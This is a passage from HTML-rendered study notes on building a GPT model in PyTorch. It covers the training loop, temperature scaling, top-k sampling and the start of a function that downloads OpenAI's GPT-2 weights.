    <span class="n">model</span><span class="p">.</span><span class="n">train</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">train_loss</span><span class="p">,</span> <span class="n">val_loss</span>

<span class="k">def</span> <span class="nf">generate_and_print_sample</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">start_context</span><span class="p">):</span>
    <span class="n">model</span><span class="p">.</span><span class="nb">eval</span><span class="p">()</span>
    <span class="n">context_size</span> <span class="o">=</span> <span class="n">model</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">.</span><span class="n">weight</span><span class="p">.</span><span class="n">shape</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
    <span class="n">encoded</span> <span class="o">=</span> <span class="n">text_to_token_ids</span><span class="p">(</span><span class="n">start_context</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span>
        <span class="n">token_ids</span> <span class="o">=</span> <span class="n">generate_text_simple</span><span class="p">(</span>
            <span class="n">model</span><span class="o">=</span><span class="n">model</span><span class="p">,</span> <span class="n">idx</span><span class="o">=</span><span class="n">encoded</span><span class="p">,</span>
            <span class="n">max_new_tokens</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span> <span class="n">context_size</span><span class="o">=</span><span class="n">context_size</span>
        <span class="p">)</span>
    <span class="n">decoded_text</span> <span class="o">=</span> <span class="n">token_ids_to_text</span><span class="p">(</span><span class="n">token_ids</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">decoded_text</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="s">" "</span><span class="p">))</span>  <span class="c1"># Compact print format
</span>    <span class="n">model</span><span class="p">.</span><span class="n">train</span><span class="p">()</span>

<span class="c1"># Note:
# Uncomment the following code to calculate the execution time
# import time
# start_time = time.time()
</span>
<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span>
<span class="n">model</span> <span class="o">=</span> <span class="n">GPTModel</span><span class="p">(</span><span class="n">GPT_CONFIG_124M</span><span class="p">)</span>
<span class="n">model</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
<span class="n">optimizer</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">optim</span><span class="p">.</span><span class="n">AdamW</span><span class="p">(</span><span class="n">model</span><span class="p">.</span><span class="n">parameters</span><span class="p">(),</span> <span class="n">lr</span><span class="o">=</span><span class="mf">0.0004</span><span class="p">,</span> <span class="n">weight_decay</span><span class="o">=</span><span class="mf">0.1</span><span class="p">)</span>

<span class="n">num_epochs</span> <span class="o">=</span> <span class="mi">10</span>
<span class="n">train_losses</span><span class="p">,</span> <span class="n">val_losses</span><span class="p">,</span> <span class="n">tokens_seen</span> <span class="o">=</span> <span class="n">train_model_simple</span><span class="p">(</span>
    <span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">optimizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span>
    <span class="n">num_epochs</span><span class="o">=</span><span class="n">num_epochs</span><span class="p">,</span> <span class="n">eval_freq</span><span class="o">=</span><span class="mi">5</span><span class="p">,</span> <span class="n">eval_iter</span><span class="o">=</span><span class="mi">5</span><span class="p">,</span>
    <span class="n">start_context</span><span class="o">=</span><span class="s">"Every effort moves you"</span><span class="p">,</span> <span class="n">tokenizer</span><span class="o">=</span><span class="n">tokenizer</span>
<span class="p">)</span>

<span class="c1"># Note:
# Uncomment the following code to show the execution time
# end_time = time.time()
# execution_time_minutes = (end_time - start_time) / 60
# print(f"Training completed in {execution_time_minutes:.2f} minutes.")
</span></code></pre></div></div>

<p><img src="阅读图书Build Large Language Model\image%2029.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h2 id="temperature-scaling"><strong>Temperature Scaling</strong></h2>

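<p><strong>Temperature scaling</strong> is a technique for calibrating the output probabilities of deep learning models, classification models in particular. It is typically used to make predicted probabilities more reliable, so that they sit closer to the true probability distribution. Temperature scaling is a simple and effective form of <strong>model calibration</strong>.</p>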

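<h3 id="1-背景模型校准问题">1. <strong>Background: the model calibration problem</strong></h3>

<p>In classification tasks, a deep learning model usually outputs a probability for each class via the softmax function. These probabilities are not always accurate, especially when the model is over-confident or under-confident:</p>

<ul>
  <li><strong>Over-confident</strong>: the predicted probabilities are too high (for example, the model assigns a class a probability of 0.99, but it is right far less often than that).</li>
  <li><strong>Under-confident</strong>: the predicted probabilities are too low (for example, the model assigns a class a probability of 0.6 when it should be higher).</li>
</ul>

<p>The goal of model calibration is to adjust the model's output probabilities so that they are closer to the true probability distribution.</p>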
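
<p>One rough way to spot over- or under-confidence is to compare the model's average top-class confidence with its actual accuracy on held-out data. The sketch below is illustrative only: the <code>predictions</code> list is made-up data and <code>calibration_gap</code> is a hypothetical helper name, not part of any library.</p>

```python
# Hypothetical held-out predictions: (top-class confidence, was the prediction correct?)
predictions = [
    (0.99, True), (0.98, False), (0.97, True), (0.95, False),
    (0.93, True), (0.92, True), (0.90, False), (0.88, True),
]

def calibration_gap(preds):
    """Return (mean confidence, accuracy, mean confidence - accuracy)."""
    mean_conf = sum(conf for conf, _ in preds) / len(preds)
    accuracy = sum(1 for _, correct in preds if correct) / len(preds)
    return mean_conf, accuracy, mean_conf - accuracy

mean_conf, accuracy, gap = calibration_gap(predictions)
# A positive gap suggests over-confidence; a negative gap suggests under-confidence.
print(f"confidence={mean_conf:.3f} accuracy={accuracy:.3f} gap={gap:+.3f}")
```

<p>With this made-up data the average confidence is well above the accuracy, which is the over-confident case described above.</p>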

<hr />

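<h3 id="2-温度缩放的原理">2. <strong>How temperature scaling works</strong></h3>

<p>Temperature scaling adjusts the model's output probabilities by introducing a <strong>temperature parameter \( T \)</strong> into the softmax function. Specifically, the softmax formula becomes:</p>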

<p>\[
\text{softmax}(z_i) = \frac{e^{z_i / T}}{\sum_{j=1}^N e^{z_j / T}}
\]</p>

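<p>where:</p>

<ul>
  <li>\( z_i \) is the model's logit (unnormalized score) for class \( i \).</li>
  <li>\( T \) is the temperature parameter.</li>
  <li>\( N \) is the total number of classes.</li>
</ul>

<h3 id="温度参数--t--的作用">Effect of the temperature parameter \( T \):</h3>

<ul>
  <li><strong>\( T = 1 \)</strong>: the standard softmax function, with no adjustment.</li>
  <li><strong>\( T &gt; 1 \)</strong>: a higher temperature makes the output distribution smoother and lowers the model's confidence (the probabilities move toward a uniform distribution).</li>
  <li><strong>\( 0 &lt; T &lt; 1 \)</strong>: a lower temperature makes the output distribution sharper and raises the model's confidence (the probabilities move toward 0 or 1).</li>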
</ul>
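
<p>To see why dividing by \( T \) has this effect, it can help to look at the ratio of two class probabilities, writing \( p_i \) as shorthand for \( \text{softmax}(z_i) \). The normalizing sums cancel, so the ratio depends only on the logit difference and on \( T \). The numbers below assume two example logits that differ by 1, chosen only for illustration.</p>

```latex
\[
\frac{p_i}{p_j} = \frac{e^{z_i / T}}{e^{z_j / T}} = e^{(z_i - z_j)/T}
\]
\[
z_i - z_j = 1: \quad
T = 0.5 \Rightarrow \frac{p_i}{p_j} = e^{2} \approx 7.39, \qquad
T = 1 \Rightarrow \frac{p_i}{p_j} = e^{1} \approx 2.72, \qquad
T = 2 \Rightarrow \frac{p_i}{p_j} = e^{0.5} \approx 1.65
\]
```

<p>As \( T \) grows, the ratio approaches 1 (a uniform distribution); as \( T \) approaches 0, the ratio grows without bound (all probability mass on the largest logit).</p>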

<hr />

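<h3 id="3-温度缩放的实现">3. <strong>Implementing temperature scaling</strong></h3>

<p>Temperature scaling is very simple to implement and usually involves two steps:</p>

<ol>
  <li>Fit a temperature parameter \( T \) on the validation set.</li>
  <li>Apply the fitted \( T \) on the test set or at inference time to adjust the model's output probabilities.</li>
</ol>

<h3 id="代码示例">Code example:</h3>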

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn.functional</span> <span class="k">as</span> <span class="n">F</span>

<span class="c1"># Example logits output by a model
</span><span class="n">logits</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([[</span><span class="mf">2.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">]])</span>

<span class="c1"># Standard softmax (T=1)
</span><span class="n">probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Standard softmax:"</span><span class="p">,</span> <span class="n">probs</span><span class="p">)</span>  <span class="c1"># Output: tensor([[0.6590, 0.2424, 0.0986]])
</span>
<span class="c1"># Temperature scaling (T=2)
</span><span class="n">T</span> <span class="o">=</span> <span class="mi">2</span>
<span class="n">scaled_probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span> <span class="o">/</span> <span class="n">T</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Temperature scaled (T=2):"</span><span class="p">,</span> <span class="n">scaled_probs</span><span class="p">)</span>  <span class="c1"># Output: tensor([[0.5017, 0.3043, 0.1940]])
</span>
<span class="c1"># Temperature scaling (T=0.5)
</span><span class="n">T</span> <span class="o">=</span> <span class="mf">0.5</span>
<span class="n">scaled_probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span> <span class="o">/</span> <span class="n">T</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Temperature scaled (T=0.5):"</span><span class="p">,</span> <span class="n">scaled_probs</span><span class="p">)</span>  <span class="c1"># Output: tensor([[0.8638, 0.1169, 0.0193]])
</span>
</code></pre></div></div>

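<h3 id="输出结果">Results:</h3>

<ul>
  <li>With \( T = 2 \), the probability distribution is smoother and the model's confidence drops.</li>
  <li>With \( T = 0.5 \), the probability distribution is sharper and the model's confidence rises.</li>
</ul>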

<hr />

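<h3 id="4-如何选择温度参数--t-">4. <strong>How to choose the temperature parameter \( T \)</strong></h3>

<p>The temperature parameter \( T \) is usually obtained by optimizing it on the validation set:</p>

<ol>
  <li>Compute the model's logits on the validation set and collect the true labels.</li>
  <li>Use an optimizer (such as gradient descent) to minimize the negative log-likelihood (NLL) loss and find the best \( T \).</li>
</ol>

<h3 id="代码示例-1">Code example:</h3>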

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Example validation-set logits and labels
</span><span class="n">val_logits</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([[</span><span class="mf">2.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">],</span> <span class="p">[</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">2.0</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">]])</span>
<span class="n">val_labels</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">])</span>  <span class="c1"># True labels
</span>
<span class="c1"># Temperature parameter T (initialized to 1.0)
</span><span class="n">T</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="n">requires_grad</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>

<span class="c1"># Optimizer
</span><span class="n">optimizer</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">optim</span><span class="p">.</span><span class="n">LBFGS</span><span class="p">([</span><span class="n">T</span><span class="p">],</span> <span class="n">lr</span><span class="o">=</span><span class="mf">0.01</span><span class="p">)</span>

<span class="c1"># Closure that L-BFGS calls to re-evaluate the loss (renamed from eval to avoid shadowing the built-in)
</span><span class="k">def</span> <span class="nf">closure</span><span class="p">():</span>
    <span class="n">optimizer</span><span class="p">.</span><span class="n">zero_grad</span><span class="p">()</span>
    <span class="n">loss</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">cross_entropy</span><span class="p">(</span><span class="n">val_logits</span> <span class="o">/</span> <span class="n">T</span><span class="p">,</span> <span class="n">val_labels</span><span class="p">)</span>
    <span class="n">loss</span><span class="p">.</span><span class="n">backward</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">loss</span>

<span class="n">optimizer</span><span class="p">.</span><span class="n">step</span><span class="p">(</span><span class="n">closure</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="s">"Optimized T:"</span><span class="p">,</span> <span class="n">T</span><span class="p">.</span><span class="n">item</span><span class="p">())</span>  <span class="c1"># Print the optimized temperature
</span>
</code></pre></div></div>
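
<p>Note that in the toy validation set above both examples are already classified correctly, so the NLL keeps decreasing as \( T \) shrinks and there is no finite optimum. The following sketch, written in plain Python so it runs without PyTorch, assumes a hypothetical validation set with one confidently misclassified example and uses a simple grid search in place of L-BFGS. The data, the grid, and the helper name <code>nll</code> are assumptions made for illustration.</p>

```python
import math

def nll(logits_batch, labels, T):
    """Mean negative log-likelihood of the labels under softmax(logits / T)."""
    total = 0.0
    for logits, label in zip(logits_batch, labels):
        scaled = [z / T for z in logits]
        m = max(scaled)  # subtract the max for numerical stability
        log_sum = m + math.log(sum(math.exp(s - m) for s in scaled))
        total += log_sum - scaled[label]
    return total / len(labels)

# Hypothetical validation data: the third example is confidently wrong.
val_logits = [[2.0, 1.0, 0.1], [1.0, 2.0, 0.1], [3.0, 0.5, 0.2]]
val_labels = [0, 1, 1]

# Grid search over T from 0.5 to 5.0 in steps of 0.1.
candidates = [round(0.5 + 0.1 * i, 1) for i in range(46)]
best_T = min(candidates, key=lambda T: nll(val_logits, val_labels, T))

print("NLL at T=1:", round(nll(val_logits, val_labels, 1.0), 4))
print("Best T on the grid:", best_T)
print("NLL at best T:", round(nll(val_logits, val_labels, best_T), 4))
```

<p>On this data the best \( T \) is greater than 1, which softens the distribution and is consistent with an over-confident model.</p>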

<hr />

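<h3 id="5-温度缩放的应用场景">5. <strong>Where temperature scaling is used</strong></h3>

<ul>
  <li><strong>Model calibration</strong>: makes the model's output probabilities more reliable and closer to the true probability distribution.</li>
  <li><strong>Uncertainty estimation</strong>: when the model's uncertainty matters (for example in medical diagnosis or autonomous driving), temperature scaling helps quantify that uncertainty better.</li>
  <li><strong>Ensembles</strong>: in model ensembling, temperature scaling can be used to adjust the output probabilities of each member model.</li>
</ul>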

<hr />

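<h3 id="6-温度缩放的优缺点">6. <strong>Advantages and disadvantages of temperature scaling</strong></h3>

<h3 id="优点">Advantages:</h3>

<ul>
  <li>Simple to implement: it needs only one extra parameter, \( T \).</li>
  <li>Computationally cheap, so it is practical for large models.</li>
  <li>Can effectively improve the model's calibration.</li>
</ul>

<h3 id="缺点">Disadvantages:</h3>

<ul>
  <li>It only changes how smooth the probability distribution is; it cannot change the ranking of the classes, so the predicted class stays the same.</li>
  <li>Some complex tasks may need more sophisticated calibration methods.</li>
</ul>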
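
<p>The first limitation can be checked directly: dividing every logit by the same positive \( T \) never reorders them. The plain-Python sketch below reuses the example logits from earlier in this section; <code>softmax_with_temperature</code> and <code>ranking</code> are hypothetical helper names.</p>

```python
import math

def softmax_with_temperature(logits, T):
    """Softmax of logits / T, computed with the max subtracted for stability."""
    scaled = [z / T for z in logits]
    m = max(scaled)
    exps = [math.exp(s - m) for s in scaled]
    total = sum(exps)
    return [e / total for e in exps]

def ranking(values):
    """Indices sorted from the largest value to the smallest."""
    return sorted(range(len(values)), key=lambda i: values[i], reverse=True)

logits = [2.0, 1.0, 0.1]
for T in (0.5, 1.0, 2.0):
    probs = softmax_with_temperature(logits, T)
    # The probabilities change with T, but the ranking is the same every time.
    print(T, [round(p, 4) for p in probs], ranking(probs))
```

<p>The probabilities differ for each \( T \), yet the ranking is always <code>[0, 1, 2]</code>, so accuracy is unaffected.</p>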

<hr />

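<h3 id="总结">Summary</h3>

<ul>
  <li><strong>Temperature scaling</strong> is a simple and effective model calibration technique that tunes the model's output probabilities by adjusting the temperature parameter \( T \) in the softmax function.</li>
  <li>It is widely used in classification tasks, especially where reliable probability estimates are needed (for example in medicine or finance).</li>
  <li>It is very simple to implement and computationally cheap, which makes it one of the preferred methods for model calibration.</li>
</ul>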


<p><img src="阅读图书Build Large Language Model\image%2030.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h2 id="top-k-sampling"><strong>Top-k Sampling</strong></h2>

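<p><strong>Top-k sampling</strong> is a sampling strategy for text generation, commonly used with language models such as GPT. The core idea is to take the \( k \) tokens with the highest predicted probability and sample from those \( k \) tokens only, rather than from the entire vocabulary.</p>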

<hr />

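<h3 id="1-背景文本生成中的采样问题">1. <strong>Background: the sampling problem in text generation</strong></h3>

<p>In text generation, a language model outputs a probability distribution that gives the likelihood of each token being the next one. Conventional decoding methods such as greedy search and random sampling have the following problems:</p>

<ul>
  <li><strong>Greedy search</strong>: always picks the most probable token, which tends to produce monotonous, repetitive text.</li>
  <li><strong>Random sampling</strong>: samples from the entire vocabulary according to the predicted probabilities, which can produce incoherent or out-of-context text.</li>
</ul>

<p>Top-k sampling is a compromise: it avoids the monotony of greedy search while reducing the unpredictability of random sampling.</p>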
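
<p>The difference between the two baseline strategies can be sketched in a few lines of plain Python. The vocabulary and probabilities below are made up for illustration, and <code>greedy_pick</code> and <code>random_pick</code> are hypothetical helper names.</p>

```python
import random

# Hypothetical next-token distribution over a tiny vocabulary.
vocab = ["forward", "toward", "closer", "pizza"]
probs = [0.55, 0.30, 0.14, 0.01]

def greedy_pick(probs):
    """Greedy search: always return the index of the most probable token."""
    return max(range(len(probs)), key=lambda i: probs[i])

def random_pick(probs, rng):
    """Random sampling: draw an index in proportion to its probability."""
    return rng.choices(range(len(probs)), weights=probs, k=1)[0]

rng = random.Random(0)  # fixed seed so the run is repeatable
greedy_tokens = [vocab[greedy_pick(probs)] for _ in range(5)]
sampled_tokens = [vocab[random_pick(probs, rng)] for _ in range(5)]
print("greedy: ", greedy_tokens)
print("sampled:", sampled_tokens)
```

<p>Greedy search returns the same token on every call, while random sampling can return any token with non-zero probability, including the unlikely one.</p>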

<hr />

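<h3 id="2-top-k-采样的原理">2. <strong>How top-k sampling works</strong></h3>

<p>The core idea of top-k sampling is:</p>

<ol>
  <li>From the model's output distribution, select the \( k \) tokens with the highest probability.</li>
  <li>Renormalize the probabilities of these \( k \) tokens so that they sum to 1.</li>
  <li>Randomly sample one of these \( k \) tokens as the next token.</li>
</ol>

<h3 id="数学公式">Formula:</h3>

<p>Let the model's output distribution be \( P(x) \). Top-k sampling then proceeds as follows:</p>

<ol>
  <li>Select the \( k \) tokens with the highest probability and call this set \( V_{\text{top-k}} \).</li>
  <li>Renormalize the probabilities: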
\[
P_{\text{top-k}}(x) = \begin{cases}
\frac{P(x)}{\sum_{x' \in V_{\text{top-k}}} P(x')} &amp; \text{if } x \in V_{\text{top-k}} \\
0 &amp; \text{otherwise}
\end{cases}
\]</li>
  <li>Randomly sample one token from \( P_{\text{top-k}}(x) \).</li>
</ol>

<hr />

<h3 id="3-top-k-采样的实现">3. <strong>Implementing top-k sampling</strong></h3>

<p>Below is a simple Python implementation:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn.functional</span> <span class="k">as</span> <span class="n">F</span>

<span class="k">def</span> <span class="nf">top_k_sampling</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">k</span><span class="p">):</span>
    <span class="c1"># logits: unnormalized scores output by the model, shape (vocab_size,)
</span>    <span class="c1"># k: number of top tokens to keep
</span>    <span class="n">probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># Convert logits to a probability distribution
</span>    <span class="n">top_k_probs</span><span class="p">,</span> <span class="n">top_k_indices</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">topk</span><span class="p">(</span><span class="n">probs</span><span class="p">,</span> <span class="n">k</span><span class="p">)</span>  <span class="c1"># Probabilities and indices of the top k tokens
</span>    <span class="n">top_k_probs</span> <span class="o">=</span> <span class="n">top_k_probs</span> <span class="o">/</span> <span class="n">top_k_probs</span><span class="p">.</span><span class="nb">sum</span><span class="p">()</span>  <span class="c1"># Renormalize so the kept probabilities sum to 1
</span>    <span class="n">sampled_index</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">multinomial</span><span class="p">(</span><span class="n">top_k_probs</span><span class="p">,</span> <span class="n">num_samples</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># Sample a position within the top k
</span>    <span class="k">return</span> <span class="n">top_k_indices</span><span class="p">[</span><span class="n">sampled_index</span><span class="p">]</span>  <span class="c1"># Map back to the vocabulary index of the sampled token
</span>
</code></pre></div></div>

<h3 id="示例">Example:</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Example logits output by a model
</span><span class="n">logits</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">2.0</span><span class="p">,</span> <span class="mf">3.0</span><span class="p">,</span> <span class="mf">4.0</span><span class="p">,</span> <span class="mf">5.0</span><span class="p">])</span>

<span class="c1"># Top-k sampling with k=3
</span><span class="n">sampled_index</span> <span class="o">=</span> <span class="n">top_k_sampling</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">3</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Sampled index:"</span><span class="p">,</span> <span class="n">sampled_index</span><span class="p">.</span><span class="n">item</span><span class="p">())</span>

</code></pre></div></div>
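
<p>For the example logits above, the renormalized top-k distribution can be worked out explicitly. The plain-Python sketch below does so, and also checks an equivalent formulation: set every logit outside the top \( k \) to negative infinity and apply softmax once. The helper names are hypothetical and ties between equal logits are not treated specially.</p>

```python
import math

def softmax(logits):
    """Numerically stable softmax; a logit of -inf gets probability 0."""
    m = max(logits)
    exps = [math.exp(z - m) for z in logits]
    total = sum(exps)
    return [e / total for e in exps]

def top_k_renormalized(logits, k):
    """Softmax first, keep the k largest probabilities, then renormalize."""
    probs = softmax(logits)
    keep = sorted(range(len(probs)), key=lambda i: probs[i], reverse=True)[:k]
    kept_mass = sum(probs[i] for i in keep)
    return [probs[i] / kept_mass if i in keep else 0.0 for i in range(len(probs))]

def top_k_masked(logits, k):
    """Mask everything outside the top k with -inf, then softmax once."""
    keep = sorted(range(len(logits)), key=lambda i: logits[i], reverse=True)[:k]
    masked = [z if i in keep else -math.inf for i, z in enumerate(logits)]
    return softmax(masked)

logits = [1.0, 2.0, 3.0, 4.0, 5.0]
a = top_k_renormalized(logits, k=3)
b = top_k_masked(logits, k=3)
print([round(p, 4) for p in a])
print([round(p, 4) for p in b])
```

<p>Both routes give roughly 0.0900, 0.2447 and 0.6652 for the three largest logits and 0 for the rest, so only indices 2, 3 and 4 can ever be sampled with \( k = 3 \).</p>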

<hr />

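<h3 id="4-top-k-采样的优点">4. <strong>Advantages of top-k sampling</strong></h3>

<ol>
  <li><strong>Reduces the influence of low-probability tokens</strong>: restricting the sampling range avoids picking very unlikely tokens, which yields more coherent text.</li>
  <li><strong>Balances diversity and quality</strong>: compared with greedy search, top-k sampling makes the text more diverse; compared with random sampling, it improves text quality.</li>
  <li><strong>Simple to implement</strong>: it needs only one parameter, \( k \), and is computationally cheap.</li>
</ol>

<hr />

<h3 id="5-top-k-采样的缺点">5. <strong>Disadvantages of top-k sampling</strong></h3>

<ol>
  <li><strong>The limits of a fixed \( k \)</strong>:
    <ul>
      <li>If \( k \) is too small, the generated text can be overly conservative and lack diversity.</li>
      <li>If \( k \) is too large, low-probability tokens can slip in and hurt text quality.</li>
    </ul>
  </li>
  <li><strong>Not adaptive</strong>: top-k sampling uses the same \( k \) at every time step and cannot adjust the sampling range to the context.</li>
</ol>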

<hr />

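<h3 id="6-top-k-采样的改进top-pnucleus采样">6. <strong>An improvement on top-k sampling: top-p (nucleus) sampling</strong></h3>

<p><strong>Top-p sampling (also known as nucleus sampling)</strong> was proposed to address these drawbacks. Instead of always keeping the top \( k \) tokens, it keeps the smallest set of tokens whose cumulative probability is at least \( p \) (for example \( p = 0.9 \)). The sampling range therefore adapts to the context.</p>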
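
<p>A minimal plain-Python sketch of this idea follows. It is not taken from the book or from any library: <code>top_p_filter</code> and <code>top_p_sample</code> are hypothetical helper names, and the two distributions are made up to contrast a peaked case with a flat one.</p>

```python
import random

def top_p_filter(probs, p):
    """Return the renormalized nucleus: smallest top set with cumulative mass >= p."""
    order = sorted(range(len(probs)), key=lambda i: probs[i], reverse=True)
    nucleus, cumulative = [], 0.0
    for i in order:
        nucleus.append(i)
        cumulative += probs[i]
        if cumulative >= p:
            break
    # Divide by the kept mass so the nucleus probabilities sum to 1.
    return {i: probs[i] / cumulative for i in nucleus}

def top_p_sample(probs, p, rng):
    """Sample one index from the nucleus distribution."""
    nucleus = top_p_filter(probs, p)
    indices = list(nucleus)
    weights = [nucleus[i] for i in indices]
    return rng.choices(indices, weights=weights, k=1)[0]

# Hypothetical distributions: one peaked, one flat.
peaked = [0.85, 0.10, 0.03, 0.01, 0.01]
flat = [0.25, 0.22, 0.20, 0.18, 0.15]

print(sorted(top_p_filter(peaked, 0.9)))  # indices kept for the peaked case
print(sorted(top_p_filter(flat, 0.9)))    # indices kept for the flat case
print(top_p_sample(flat, 0.9, random.Random(0)))
```

<p>With \( p = 0.9 \), the peaked distribution keeps only two tokens while the flat one keeps all five, which is the adaptive behaviour that a fixed \( k \) cannot provide.</p>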

<hr />

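<h3 id="7-top-k-采样的应用场景">7. <strong>Where top-k sampling is used</strong></h3>

<p>Top-k sampling is widely used in the following tasks:</p>

<ul>
  <li><strong>Text generation</strong>: story generation, dialogue generation, code generation, and so on.</li>
  <li><strong>Machine translation</strong>: producing diverse translations.</li>
  <li><strong>Speech recognition</strong>: producing diverse transcriptions.</li>
</ul>

<hr />

<h3 id="8-总结">8. <strong>Summary</strong></h3>

<ul>
  <li><strong>Top-k sampling</strong> is a simple and effective sampling strategy for text generation that improves the quality and diversity of generated text by restricting the sampling range.</li>
  <li>It selects the \( k \) tokens with the highest probability, renormalizes their probabilities, and samples from them.</li>
  <li>Its refinement, <strong>top-p sampling</strong>, adjusts the sampling range dynamically to suit the context.</li>
</ul>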


<h2 id="加载模型loading-pretrained-weights-from-openai">Loading pretrained weights from OpenAI</h2>

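<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">os</span>

<span class="kn">import</span> <span class="nn">tensorflow</span> <span class="k">as</span> <span class="n">tf</span>
<span class="kn">import</span> <span class="nn">torch</span>

<span class="c1"># download_file and load_gpt2_params_from_tf_ckpt are assumed to be defined elsewhere (not shown here)</span>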
<span class="k">def</span> <span class="nf">download_and_load_gpt2</span><span class="p">(</span><span class="n">model_size</span><span class="p">,</span> <span class="n">models_dir</span><span class="p">):</span>
    <span class="c1"># Validate model size
</span>    <span class="n">allowed_sizes</span> <span class="o">=</span> <span class="p">(</span><span class="s">"124M"</span><span class="p">,</span> <span class="s">"355M"</span><span class="p">,</span> <span class="s">"774M"</span><span class="p">,</span> <span class="s">"1558M"</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">model_size</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">allowed_sizes</span><span class="p">:</span>
        <span class="k">raise</span> <span class="nb">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s">"Model size not in </span><span class="si">{</span><span class="n">allowed_sizes</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>

    <span class="c1"># Define paths
</span>    <span class="n">model_dir</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">models_dir</span><span class="p">,</span> <span class="n">model_size</span><span class="p">)</span>
    <span class="n">base_url</span> <span class="o">=</span> <span class="s">"https://openaipublic.blob.core.windows.net/gpt-2/models"</span>
    <span class="n">backup_base_url</span> <span class="o">=</span> <span class="s">"https://f001.backblazeb2.com/file/LLMs-from-scratch/gpt2"</span>
    <span class="n">filenames</span> <span class="o">=</span> <span class="p">[</span>
        <span class="s">"checkpoint"</span><span class="p">,</span> <span class="s">"encoder.json"</span><span class="p">,</span> <span class="s">"hparams.json"</span><span class="p">,</span>
        <span class="s">"model.ckpt.data-00000-of-00001"</span><span class="p">,</span> <span class="s">"model.ckpt.index"</span><span class="p">,</span>
        <span class="s">"model.ckpt.meta"</span><span class="p">,</span> <span class="s">"vocab.bpe"</span>
    <span class="p">]</span>

    <span class="c1"># Download files
